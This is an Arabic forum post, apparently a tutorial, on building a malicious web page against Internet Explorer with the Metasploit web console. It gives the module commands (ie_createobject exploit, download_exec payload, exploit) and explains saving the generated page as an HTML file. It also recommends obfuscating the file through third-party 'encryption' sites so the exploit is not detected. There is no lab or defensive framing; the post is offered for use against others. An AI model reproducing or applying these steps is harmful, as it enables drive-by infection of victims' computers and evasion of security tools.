تحية لكم ياأعضاء منتديات مجروح بغيابك سنتنال في موضوعنا إن شاء الله طريقة عمل ثغرة لمتصفح الإكسبلورر ، نقوم بفتح اداة الميتا Metasploit web وسوف تنفتح الاداة لنا في المتصفح كما في الصورة التالية :نضغط على خيار console ومن ثم ننفذ امر الاستعراض للاكسبلويتات
كود PHP:
show exploits
نقوم باختيار الاكسبلويت التالي :
كود PHP:
use windows/browser/ie_createobject
ومن ثم كالمعتاد نقوم باستعراض الخيارات بامر :
كود PHP:
show options
وسنقوم بالتعديل على خيار الاسم بالامر :
كود PHP:
set URIPATH xxxx
ضع اي اسم تريد
بعد ذلك سنقوم باستعراض البايلودات وتحديد المناسب لنا من خلال الاوامر التالية :
كود PHP:
show payloads
set payload windows/download_exec
بعد ذلك نقوم باستعراض الخيارات واعتقد معروف الامر ونطبق الموضح في الصور التالية :
الأن نقوم بتطبيق الخطوات والخيارات التي عدلناها سابقا من خلال الأمر :
كود PHP:
exploit
سوف يعطينا رابط يحتوي على الثغرة التي قام بعملها نقوم بنسخ الرابط
نضع الرابط في المتصفح وستظهر لنا الثغرة نقوم بتحديد مصدر الصفحة ونقوم بتحديد الكل داخل المصدر ونقوم بنسخها ولصقها في ملف نوتباد وحفظها بامتداد html
سينتج لنا ملف للثغرة كما بالصورة التالية
طبعا الثغرة مكشوفة وتحتاج الى تشفير وهنالك العديد من المواقع التي تقدم خدمة تشفير ثغرات html وفي الرابط التالي احد المواقع
موقع تشفير
نسأل الله أن نكون قد وفقنا في إيصال الفكرة بشكل مناسب ونأسف على أي قصور